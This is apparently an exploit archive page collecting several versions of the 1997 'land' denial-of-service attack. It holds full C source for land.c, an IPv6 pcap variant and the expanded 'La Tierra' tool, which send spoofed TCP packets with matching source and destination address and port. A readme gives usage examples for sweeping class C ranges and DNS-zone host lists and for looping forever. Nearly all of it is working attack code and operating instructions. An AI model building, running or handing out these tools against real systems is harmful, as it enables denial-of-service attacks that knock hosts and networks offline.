  // fill ethernet header
  eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like 00:something;
  eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];
  eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];
  eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];
  eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];
  eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];
  eth_hdr->ether_type = htons(0x86DD);   // IPv6 (the original wrote the byte-swapped literal 0xdd86)


  // fill IP header
  // source ip == destination ip
  memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
  memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
  ip6_hdr->ip_hl = 255;
  ip6_hdr->ip_nh = IPPROTO_TCP;
  ip6_hdr->ip_len = htons (20);
  ip6_hdr->ip_flags[0] = 0x06 << 4;
  srand((unsigned int) time(0));
  // fill tcp header: source port equal to destination port (the Land condition)
  tcp_hdr->th_sport = tcp_hdr->th_dport =  htons (atoi(argv[3]));
  tcp_hdr->th_seq = rand();
  tcp_hdr->th_ack = rand();
  tcp_hdr->th_off = 5;          // 20-byte header, no options; 4-bit field, not byte-swapped
  tcp_hdr->th_win = rand();
  tcp_hdr->th_sum = 0;          // must be zero while the checksum is computed
  tcp_hdr->th_urp = htons(10);
  tcp_hdr->th_flags = 2;        // TH_SYN
  // TCP checksum over the IPv6 pseudo-header (src + dst, upper-layer length,
  // next header) followed by the TCP header itself
  int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);
  chsum += htons (sizeof (struct libnet_tcp_hdr)) + htons (IPPROTO_TCP); // the original summed these as one word, which is arithmetically identical
  chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct libnet_tcp_hdr));
  tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);
  // send data to wire
  retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));
  if ( retVal == -1 )
  {
    fprintf(stderr,"Error writing packet to wire!!\n");
  }
  //
  // close adapter, free mem.. etc..
  //
  pcap_close(pcap_handle);
  freeaddrinfo(addrinfo);
  WSACleanup();
  return EXIT_SUCCESS;
}

		

- Vulnerability information (20812)

FreeBSD 2.x, HP-UX 9/10/11, kernel 2.0.3, Windows NT 4.0/Server 2003, NetBSD 1 loopback (land.c) DoS (3) (EDBID:20812)
windows remote
1997-11-20 Verified
0 m3lt
N/A
source: http://www.securityfocus.com/bid/2666/info
  

/* land.c by m3lt, FLC
   crashes a win95 box

   Build note: the original used the libc5-era headers <netinet/ip_tcp.h> and
   <netinet/protocols.h> (IP_TCP). On glibc the BSD-style tcphdr field names
   need __FAVOR_BSD and the protocol constant is IPPROTO_TCP. */

#define _DEFAULT_SOURCE
#define __FAVOR_BSD

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

/* TCP pseudo-header used for the checksum, followed by the TCP header itself */
struct pseudohdr
{
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;
};

/* RFC 1071 one's-complement checksum over `length` bytes */
u_short checksum(u_short * data,u_short length)
{
        register long value=0;          /* the original left this uninitialised */
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)               /* trailing odd byte (not reached here: 32 bytes) */
                value+=((u_char *) data)[length-1];

        while(value>>16)                /* fold every carry, not just one */
                value=(value&65535)+(value>>16);

        return(~value);
}

int main(int argc,char * * argv)
{
        struct sockaddr_in sin;
        struct hostent * hoste;
        int sock;
        char buffer[40];
        struct iphdr * ipheader=(struct iphdr *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt, FLC\n");

        if(argc<3)
        {
                fprintf(stderr,"usage: %s IP port\n",argv[0]);
                return(-1);
        }

        bzero(&sin,sizeof(struct sockaddr_in));
        sin.sin_family=AF_INET;

        if((hoste=gethostbyname(argv[1]))!=NULL)
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==INADDR_NONE)
        {
                fprintf(stderr,"unknown host %s\n",argv[1]);
                return(-1);
        }

        if((sin.sin_port=htons(atoi(argv[2])))==0)
        {
                fprintf(stderr,"unknown port %s\n",argv[2]);
                return(-1);
        }

        /* raw socket; with IPPROTO_RAW we supply the IP header ourselves */
        if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))==-1)
        {
                fprintf(stderr,"couldn't allocate raw socket\n");
                return(-1);
        }

        /* IP header: source address == destination address */
        bzero(buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->version=4;
        ipheader->ihl=sizeof(struct iphdr)/4;
        ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->id=htons(0xF1C);
        ipheader->ttl=255;
        ipheader->protocol=IPPROTO_TCP;
        ipheader->saddr=sin.sin_addr.s_addr;
        ipheader->daddr=sin.sin_addr.s_addr;

        /* TCP header: source port == destination port, SYN only */
        tcpheader->th_sport=sin.sin_port;
        tcpheader->th_dport=sin.sin_port;
        tcpheader->th_seq=htonl(0xF1C);
        tcpheader->th_flags=TH_SYN;
        tcpheader->th_off=sizeof(struct tcphdr)/4;
        tcpheader->th_win=htons(2048);

        /* TCP checksum over pseudo-header + TCP header; the IP header checksum
           is left zero and filled in by the kernel on a raw socket */
        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.protocol=IPPROTO_TCP;
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,
                  (struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
        {
                fprintf(stderr,"couldn't send packet\n");
                return(-1);
        }

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

        close(sock);
        return(0);
}


		

- Vulnerability information (20813)

FreeBSD 2.x, HP-UX 9/10/11, kernel 2.0.3, Windows NT 4.0/Server 2003, NetBSD 1 loopback (land.c) DoS (4) (EDBID:20813)
multiple remote
1997-11-20 Verified
0 MondoMan
N/A
source: http://www.securityfocus.com/bid/2666/info
   

/**************************************************************/
/*                                                            */
/*  La Tierra v1.0b  - by MondoMan (KeG), elmondo@usa.net     */
/*                                                            */
/*  Modified version of land.c by m3lt, FLC                   */
/*                                                            */
/*  Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz     */
/*  gcc version 2.7.2.1       tabs set to 3                   */
/*                                                            */
/*  gcc latierra.c -o latierra                                */
/*                                                            */
/*  Refer to readme.txt for more details and history          */
/*                                                            */
/**************************************************************/                                  
#define _DEFAULT_SOURCE
#define __FAVOR_BSD           /* BSD-style tcphdr field names on glibc */

#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>      /* the original used the libc5-era <netinet/ip_tcp.h> */
#ifndef IP_TCP
#define IP_TCP IPPROTO_TCP    /* constant from libc5's <netinet/protocols.h> */
#endif

#define DEFAULT_FREQUENCY     1
#define TRUE                  1
#define FALSE                 0
#define FOR_EVER              -5
#define LIST_FILE             1
#define ZONE_FILE             2
#define MAXLINELENGTH         512
#define DEFAULT_SEQ           0xF1C
#define DEFAULT_TTL           0xFF
#define DEFAULT_TCPFLAGS      (TH_SYN | TH_PUSH)
#define DEFAULT_WINSIZE       0xFDE8

struct pseudohdr
	{
   struct in_addr saddr;
   struct in_addr daddr;
   u_char zero;
   u_char protocol;
   u_short length;
   struct tcphdr tcpheader;
	};

typedef struct latierra_data
	{
	char dest_ip[256];
	int  tcp_flags;
	int  window_size;
	int  ip_protocol;
	int  sequence_number;
	int  ttl;
	int  supress_output;
        int  message_type;
	} LATIERRA_DATA;

void alternatives(void);
int  get_ip(int use_file, FILE *fp, char *buff);
int  land(LATIERRA_DATA *ld, int port_number);
void nslookup_help(void);
void print_arguments(void);
void protocol_list(void);

/********/
/* main */
/********/
int main(int argc, char **argv)
{
	FILE *fp;
	LATIERRA_DATA ld;
	int frequency = DEFAULT_FREQUENCY, x;
	int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE;
	int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE;
   char got_ip = FALSE, got_beg_port = FALSE;
	char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16];

	printf("\nlatierra v1.0b by MondoMan (elmondo@usa.net), KeG\n");
   printf("Enhanced version of land.c originally developed by m3lt, FLC\n");

	strcpy(valid_tcp_flags, "fsrpau");
	ld.tcp_flags = 0;
	ld.window_size = DEFAULT_WINSIZE;
	ld.ip_protocol = IP_TCP;
	ld.sequence_number = DEFAULT_SEQ;
	ld.ttl = DEFAULT_TTL;
	ld.message_type = 0;
	
	if(argc > 1 && (!strcmp(argv[1], "-a")))
		alternatives();

	if(argc > 1 && (!strcmp(argv[1], "-n")))
		nslookup_help();

	if(argc > 1 && (!strcmp(argv[1], "-p")))
		protocol_list();

	if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h"))))
		print_arguments();

	while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF)
		{
		switch(i)
			{	
			case 't':
				for(x=0;x<strlen(optarg);x++)
					switch(optarg[x])
						{
						case 'f':                        /* fin */
							ld.tcp_flags |= TH_FIN;
							break;
						case 's':                        /* syn */
							ld.tcp_flags |= TH_SYN;
							break;
						case 'r':                        /* reset */
							ld.tcp_flags |= TH_RST;
							break;
						case 'p':                        /* push */
							ld.tcp_flags |= TH_PUSH;			
							break;
						case 'a':                        /* ack */
							ld.tcp_flags |= TH_ACK;
							break;
						case 'u':                        /* urgent */
							ld.tcp_flags |= TH_URG;
							break;
						default:
							printf("\nERROR: Invalid option specified [ %c ] for tcp_flags.\n\n", optarg[x]);
							return(-12);
							break;
						}
				break;
			case 'q':
				ld.sequence_number = atoi(optarg);
				break;
			case 'w':
				ld.window_size = atoi(optarg);
				break;
			case 'm':
				ld.message_type = atoi(optarg);
				break;
			case 'v':
				ld.ttl = atoi(optarg);
				break;
			case 'p':
				ld.ip_protocol = atoi(optarg);
				break;
			case 'o':
				ld.supress_output = TRUE;
				break;
			case 'i':
				if(strlen(optarg) > 1)
					strcpy(ld.dest_ip, optarg);
				else
					{
					printf("ERROR: Must specify valid IP or hostname.\n");
					return(-6);
					}
				got_ip = TRUE;
				break;
			case 's':
				frequency = atoi(optarg);	
				break;
			case 'l':
				loop = atoi(optarg);
				break;
			case 'b':
				beginning_port = atoi(optarg);
				got_beg_port = TRUE;
				break;
			case 'e':
				ending_port = atoi(optarg);
				break;
			}
		}

	if(!ld.tcp_flags)
		ld.tcp_flags = DEFAULT_TCPFLAGS;

	if(!got_beg_port)
		{
		fprintf(stderr, "\nMust specify beginning port number.  Use -h for help with arguments.\n\n");
		return(-7);
		}

	if(ending_port == 0)
		ending_port = beginning_port;

	printf("\nSettings:\n\n");

   printf("  (-i)   Dest. IP Addr   : ");

	if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-')
		{
		ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0;
		strcpy(class_c_addr, ld.dest_ip);
		strcat(ld.dest_ip, "1");
		printf(" %s (Class C range specified).\n", ld.dest_ip);
		increment_addr = TRUE;
		octet = 1;
		}
	else
		if(strlen(ld.dest_ip) > 5)
			{
			if(strncmp(ld.dest_ip, "zone=", 5)==0)
				{
				strcpy(filename, &ld.dest_ip[5]);
				printf("%s (using DNS zone file)\n", filename);
				use_file = ZONE_FILE;
				}	
			else if(strncmp(ld.dest_ip, "list=", 5) == 0)
				{
				strcpy(filename, &ld.dest_ip[5]);
				printf("%s (using ASCII list)\n", filename);
				use_file = LIST_FILE;
				}
			else
				printf("%s\n", ld.dest_ip);
			}
		else 
			{
			printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip);
			return(-9);
			}

	printf("  (-b)   Beginning Port #: %d\n",     beginning_port );
	printf("  (-e)   Ending Port #   : %d\n",     ending_port );
	printf("  (-s)   Seconds to Pause: %d\n",     frequency );
	printf("  (-l)   Loop            : %d %s\n",  loop, (loop == FOR_EVER) ? "(forever)" : " " );
	printf("  (-w)   Window size     : %d\n",     ld.window_size );
	printf("  (-q)   Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number );
	printf("  (-v)   Time-to-Live    : %d\n",     ld.ttl);
	printf("  (-p)   IP Protocol #   : %d\n",     ld.ip_protocol );
	printf("  (-t)   TCP flags       : "); 

	strcpy(buff, "");

	if( ld.tcp_flags & TH_FIN)
		strcat(buff, "fin ");
	if( ld.tcp_flags & TH_SYN)
		strcat(buff, "syn ");
	if(ld.tcp_flags & TH_RST)
		strcat(buff, "rst ");
	if(ld.tcp_flags & TH_PUSH)
		strcat(buff, "push ");
	if(ld.tcp_flags & TH_ACK)
		strcat(buff, "ack ");
	if(ld.tcp_flags & TH_URG)
		strcat(buff, "urg ");

	printf("%s\n\n", buff);
			
	if(ending_port < beginning_port)
		{
		printf("\nERROR: Ending port # must be greater than beginning port #\n\n");
		return(-8);
		}
	
	scan_loop = loop_val = loop;
	
	if(use_file)
		{
		if(access(filename, 0))
			{
			printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename);
			return(-9);
			}

		if( (fp = fopen(filename, "rt")) == NULL)
			{
			printf("ERROR: Unable to open %s.\n", filename);
			return(-10);
			}

		if(!get_ip(use_file, fp, buff))
			{
			printf("Unable to get any IP address from file %s.\n", filename);
			return(-11);
			}

		strcpy(ld.dest_ip, buff);
		}
	
	while( (loop == FOR_EVER) ? 1 : loop-- > 0)
		{
		for(i=beginning_port; i <= ending_port; i++)
			{
			if(land(&ld, i))        /* go for it BaBy! */
				break;

   		if(frequency)          /* make sure freq > 0 */
			 	{
				if(!ld.supress_output)
					printf("-> paused %d seconds.\n", frequency);
				sleep(frequency);
				}
			}

		if( (!use_file) && (loop && increment_addr) )
			{
			char temp_addr[21];

			if(++octet > 254)                        /* check for reset */
				{
				if(loop_val != FOR_EVER)              /* make sure not to repeat forever! */
					{
					if(++scan_loop > loop_val)        /* check if scanned x times */
						break;
					else
						loop = loop_val;                /* restore original value */
					}
				octet = 1;	                          /* reset */
				}

			sprintf(temp_addr, "%s%d", class_c_addr, octet);
			strcpy(ld.dest_ip, temp_addr);
		
			if(!ld.supress_output)
				printf("** incrementing to next IP address: %s\n", ld.dest_ip);

			if(scan_loop > loop_val)
				break;	/* break while loop */
			}
		else if(use_file)
			{
			if(!get_ip(use_file, fp, buff))
				break;
		
			loop++;

			strcpy(ld.dest_ip, buff);
			}

		} /* end while */

	printf("\nDone.\n\n");
} /* end main */

int  get_ip(int use_file, FILE *fp, char *buff)
{
	if(use_file == LIST_FILE)
		return(get_ip_from_list(fp, buff));
		
	return(get_ip_from_zone(fp, buff));
}

int get_ip_from_list(FILE *fp, char *buff)
{
	int ret_val;

	while(1)
		{
		ret_val = (int)fgets(buff, MAXLINELENGTH, fp);

		if((ret_val == EOF) || (ret_val == (int)NULL))
			return 0;

		if( strlen(buff) >= 7)
			if((buff[0] != ';') && (buff[0] != '['))
				{
				if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
					buff[strlen(buff)-1] = 0x0;

				return 1;
				}
		}

	return 0;
}

int get_ip_from_zone(FILE *fp, char *buff)
{
	int ret_val, i;
	char *p, delim[8];

	strcpy(delim, " \t");

	while(1)
		{
		ret_val = (int)fgets(buff, MAXLINELENGTH, fp);

		if((ret_val == EOF) || (ret_val == (int)NULL))
			return 0;

		if( strlen(buff) >= 7)
			if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0))
				{
				if( (p = strtok( buff, delim)) == NULL)
					continue;

				if( (p = strtok(NULL, delim)) == NULL)
					continue;

				if(strcmp(p, "A"))   /* be sure second column is an DNS A record */
					continue;
				
				if( (p = strtok(NULL, delim)) == NULL)
					continue;

				strcpy(buff, p);

				/* verify that we have a valid IP address to work with */

				if(inet_addr(p) == -1)
					continue;

				/* strip off trailing line characters */
				
				if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
					buff[strlen(buff)-1] = 0x0;

				return 1;
				}
		}

	return 0;
}

/************/
/* checksum */
/************/
u_short checksum(u_short * data,u_short length)
{
	register long value;
	u_short i;

	for(i = 0; i< (length >> 1); i++)
		value += data[i];

	if((length & 1)==1)
		value += (data[i] << 8);

	value = (value & 0xFFFF) + (value >> 16);

	return(~value);
}

/********/
/* land */
/********/
int land(LATIERRA_DATA *ld,  int port_number)
{
	struct sockaddr_in sin;
   int sock;
   char buffer[40];
   struct iphdr * ipheader = (struct iphdr *) buffer;
   struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
   struct pseudohdr pseudoheader;

	bzero(&sin,sizeof(struct sockaddr_in));

   sin.sin_family=AF_INET;

   if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1)
   	{
      printf("ERROR: unknown host %s\n", ld->dest_ip);
      return(-1);
      }

	if((sin.sin_port=htons(port_number))==0)
  		{
      printf("ERROR: unknown port %d\n",port_number);
      return(-2);
      }

	if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
   	{
      printf("ERROR: couldn't allocate raw socket\n");
      return(-3);
      }

	bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));

   ipheader->version=4;
   ipheader->ihl=sizeof(struct iphdr)/4;
   ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
   ipheader->id=htons(ld->sequence_number);
   ipheader->ttl = ld->ttl;
   ipheader->protocol = ld->ip_protocol;
   ipheader->saddr=sin.sin_addr.s_addr;
   ipheader->daddr=sin.sin_addr.s_addr;

   tcpheader->th_sport = sin.sin_port;
   tcpheader->th_dport = sin.sin_port;
   tcpheader->th_seq = htonl(ld->sequence_number);
   tcpheader->th_flags = ld->tcp_flags;
   tcpheader->th_off = sizeof(struct tcphdr)/4;
   tcpheader->th_win = htons(ld->window_size);

   bzero(&pseudoheader,12+sizeof(struct tcphdr));

   pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
   pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
   pseudoheader.protocol = ld->ip_protocol;
   pseudoheader.length = htons(sizeof(struct tcphdr));
   bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
   tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

   if( sendto(sock, 	buffer, 
							sizeof(struct iphdr)+sizeof(struct tcphdr),
							ld->message_type,
							(struct sockaddr *) &sin,
							sizeof(struct sockaddr_in) )==-1)
   	{
      printf("ERROR: can't send packet. (sendto failed)\n");
      return(-4);
      }

	if(!ld->supress_output)
		printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number);

   close(sock);

   return(0);
}
/* End of land */

void alternatives()
{
	printf("\nAlternative command line arguments for option -i\n\n");

	printf("    You can create two types of files that latierra can use to get\n");
	printf("    a list of IP addresses, a simple ASCII file with each IP address\n");
	printf("    appearing on each line or better yet, a DNS zone file created by\n");
	printf("    nslookup.  If you are unfamiliar with nslookup, specify a '-n' on the\n");
	printf("    command line of latierra.\n\n");
	printf("    Basically, latierra will walk down the list and send the spoofed packet\n");
	printf("    to each IP address.  Once the list is complete, and loop > 1, the list\n");
 	printf("    is repeated.   To specify that the '-i' option should use a zone file,\n");
	printf("    specify \"zone=filename.txt\" instead of an IP address.  To specify a \n");
	printf("    simple ASCII list of IP addresses, use \"list=filename.txt\".  Lines\n");
	printf("    beginning with ';' or '[' are ignored.  Lines that are not an 'A' \n");
	printf("    record (second column)in a zone file will ignored.\n\n");

	exit(-1);
}

void nslookup_help()
{
	printf("\nNSLOOKUP help\n\n");
	

	printf("To see who is the DNS server for a particular domain, issue the following:\n");
	printf("        > set type=ns\n");
	printf("        > xyz.com\n\n");
	printf("  You will see a list of the name server(s) if completed successfully\n\n");

	printf("To get a list of all the DNS entries for a particular domain, run nslookup\n");
	printf("and issue the following commands:\n");
	printf("         > server 1.1.1.1\n");
	printf("         > ls -d xyz.com > filename.txt\n\n");

	printf("Line 1 sets the server that nslookup will use to resolve a name.\n");
	printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n"); 

	exit(-1);
}

void protocol_list()
{
	printf("\nProtocol List:\n\n");	
	printf("Verified:\n");
	printf("1-ICMP   2-IGMP   3-GGP  5-ST   6-TCP   7-UCL   8-EGP   9-IGP  10-BBN_RCC_MON\n");
	printf("11-NVP11   13-ARGUS   14-EMCON   15-XNET   16-CHAOS   17-UDP   18-MUX\n");
	printf("19-DCN_MEAS   20-HMP   21-PRM   22-XNS_IDP   23-TRUNK1   24-TRUNK2\n");
	printf("25-LEAF1   26-LEAF2    27-RDP   28-IRTP      29-ISO_TP4  30-NETBLT\n");
	printf("31-MFE_NSP   32-MERIT_INP   33-SEP   34-3PC   62-CFTP    64-SAT_EXPAK\n");
	printf("66-RVD       67-IPPC        69-SAT_MON   70-VISA         71-IPCV\n");
	printf("76-BR_SAT_MON   77-SUN_ND   78-WB_MON   79-WB_EXPAK   80-ISO_IP\n");
	printf("81-VMTP   82-SECURE_VMTP   83-VINES  84-TTP   85-NSFNET_IGP   86-DGP\n");
	printf("87-TCF    88-IGRP          89-OSPFIGP         90-SPRITE_RPG   91-LARP\n\n");
	printf("Supported:\n");
	printf("    6-TCP     17-UDP    (future: PPTP, SKIP) \n\n");

	exit(-1);
}

void print_arguments()
{
	printf("Arguments: \n");
	printf("     *   -i dest_ip = destination ip address such as 1.1.1.1\n");
	printf("                If last octet is '-', then the address will increment\n");
	printf("                from 1 to 254 (Class C) on the next loop\n");
	printf("                and loop must be > 1 or %d (forever).\n", FOR_EVER);
	printf("                Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n");
	printf("                For list of alternative options, use  -a instead of -h.\n");
	printf("     *   -b port# = beginning port number (required).\n");
        printf("         -e port# = ending port number (optional)\n");
	printf("         -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n");
	printf("         -v = time_to_live value, default=%d\n", DEFAULT_TTL);
	printf("         -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n");
	printf("         -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE);
	printf("         -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ);
	printf("         -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n");
	printf("         -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY);
	printf("         -o 1 = supress additional output to screen, default=0\n" );
	printf("         -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER);
	printf("     * = required     ~ = default parameter values\n\n");
	exit(-1);
}
/* End of file */


----------------- readme.txt  ------------------------------

La Tierra v1.0b  - by MondoMan (KeG), elmondo@usa.net

       Modified version of land.c by m3lt, FLC

To compile latierra, type:

	gcc latierra.c -o latierra

	To see the help screen, use 'latierra -h'

This program crashes Windows 95, and will cause Windows NT
4.0, SP3 to utilize a high percentage of CPU.  In some
instances, CPU usage reaches 100%.
                                                         
land.c description:                                        

land.c sends a spoofed packet with the SYN flag from the
same IP and port number as the destination.  For
example, if you want to do a DoS on 1.1.1.1, port 80, it would
spoof 1.1.1.1 port 80 as the source.  The problem with
NT4 SP3, however, is that once you issue this packet to a
port, NT4 SP3 appears to ignore all other attempts -

UNTIL ...
                                                            
                     La Tierra!
                                                            
La Tierra description:                                     
                                                            
La Tierra basically works by sending NT the same packet
used in land.c but to more than one port (if specified).
It doesn't appear to matter if the port is opened or closed!
NT doesn't appear to let this happen again on the same port
successively, but you simply change ports, and you can easily 
go back to the original port and it'll work again. What's even
more interesting is the fact that port 139 works with this.
You would have thought - I'll leave that alone for now!

While testing, I used a Compaq dual Intel Pentium Pro 200, and
was able to take up to 64% CPU.  With one processor disabled,
CPU usage was 100%.  NT4 SP3 doesn't seem to crash, just needs
time to recover, even with one spoofed packet.

Features include:

	- Ability to launch a DoS on an entire class C address
	- Specify the beginning and ending port range
	- Specify the number of loops or make it loop forever!
	- User defined TCP flags: fin, syn, reset, push, ack, 
	  and urgent
	- Other IP options such as window size, time-to-live, 
	  sequence_number, and message_type
	- Ability to read a DNS zone file for IP addresses
	- Ability to read an ASCII file containing IP addresses

Command line options:

     - i ip_address

	DEFAULT: None
	RANGE: Valid IP Address
	OPTIONAL: No

	where ip_address is a valid ip_address, or if you wish to
	cycle through a class C address, the last octet is dropped
        and replaced with a '-'.  This option is required.  The 
	source and destination address are obtained from this value.

	Rather than specifying an IP address, you may wish to create
        an ASCII file, or better yet, use nslookup to obtain all 
        zone information for a particular domain.  The ASCII file
	simply contains a list of IP addresses, one on each line.

	To get a DNS file, simply use nslookup, and the 
	"ls -d somedomain.com > filename.txt" command.  You can use
	'latierra -n' to read more about the command sequence for
	nslookup.

	In both types of files, lines that begin with ';' or '[' are 
	ignored. In DNS files, only 'A' records are processed.

	Examples:

	   Single IP Address:
		-i 10.1.2.1

	   Class C range:
		-i 10.1.2.-

	   ASCII file:
		-i list=filename.txt

	   DNS file:
		-i zone=filename.txt

     -b beginning_port_number

	DEFAULT: None
	RANGE: Positive Integer
	OPTIONAL: No

	where this value is the port_number that latierra will use. If
	no ending_port_number is specified, ending_port_number is then
	equal to this value.  Valid range is 1 to 0xFFFF

     -e ending_port_number

	DEFAULT: If not specified, equal to beginning_port_number
	RANGE: Positive Integer
	OPTIONAL: Yes

	is the highest port number in the range to cycle through. 

	Example:

		-i 10.1.2.1 -b 23 -e 80

	will start at port 23 and increment up to port 80.  You can 
        delay the next increment by using the -s option.  Valid range
	is 1 to 0xFFFF

     -s seconds_between_spoofs

	DEFAULT: 1
	RANGE: Positive Integer
	OPTIONAL: Yes

	You may want to control the seconds between spoofs.  If you
        specify a zero, no delays occur.

	In the example below, the spoof will occur between ports 23 and 80,
	every 3 seconds.

		-i 10.1.2.1 -b 23 -e 80 -s 3

     -l number_of_loops
	
	DEFAULT: 1
	RANGE: Positive Integer, -5 loops forever
	OPTIONAL: Yes
	
	This option if set greater than 1, will cause a repeat of the
        cycle.  For example:

		-i 10.1.2.1 -b 23 -e 80 -s 0 -l 8

	will cause latierra to go through ports 23 through 80 and
	repeat the process 8 times, with no delay.  Look at the
	following example:

		-i 10.1.2.- -b 23 -e 80 -s 0 -l 8

	latierra will start at 10.1.2.1, port 23 through 80, then
	increment to 10.1.2.2, port 23 through 80, and so on until
	it gets to 10.1.2.254, in which case it will repeat the
	same procedure over again 8 times.

	By specifying a value of -5 for this option, latierra will
	loop forever, until you manually stop the process.  In the
	last example above, the procedure would never end.  When it
	reaches 10.1.2.254, it falls back to 10.1.2.1 and starts
	over again from there.

	Other examples:

		-i 10.1.2.1 -b 139 -s 0 -l -5
		-i 10.1.2.- -b 80 -s 5 -l 10
                                                      
     -t tcp_flags

	DEFAULT: sp   (SYN, PUSH)
	RANGE: valid character set (see below)
	OPTIONAL: Yes

	this option sets the various TCP flags, which include:

		f = fin		s = syn		r = reset
		p = push	a = ack		u = urgent

	Example:

		-i 10.1.2.1 -b 139 -t apu -s 0

		To set the ack, push, and urgent flag

     -v time_to_live_value

	DEFAULT: 0xFF (255 decimal)
	RANGE: Positive Integer
	OPTIONAL: Yes

	Sets the time to live value.

     -p protocol_value

	DEFAULT: 6 (tcp)
	RANGE: Positive Integer
	OPTIONAL: Yes

	Sets the protocol value in the IP header.  To see a list of 
 	available protocols, run "latierra -p".

     -w window_size_value

	DEFAULT: 0xFFFF (65000 decimal)
	RANGE: Positive long value
	OPTIONAL: Yes

     -q tcp_sequence_number_value

	DEFAULT: 0xF1C
	RANGE: Positive integer
	OPTIONAL: Yes

     -o 1 supress_additional_output

	DEFAULT: messages are printed for status
	RANGE: None
	OPTIONAL: Yes

	If you don't want to see the messages during the process,
	simply use this "-o 1" to turn them off.

Final Note:

Please use this program for in-house testing purposes only.  

Just because you're sending spoofed packets doesn't mean you
can't be traced.

Good luck.

- MondoMan
elmondo@usa.net
                                                          
-------------------- end of file -------------------------------
		

- Vulnerability information (20814)

FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (5) (EDBID:20814)
windows remote
1997-11-20 Verified
0 Dejan Levaja
N/A
source: http://www.securityfocus.com/bid/2666/info
    
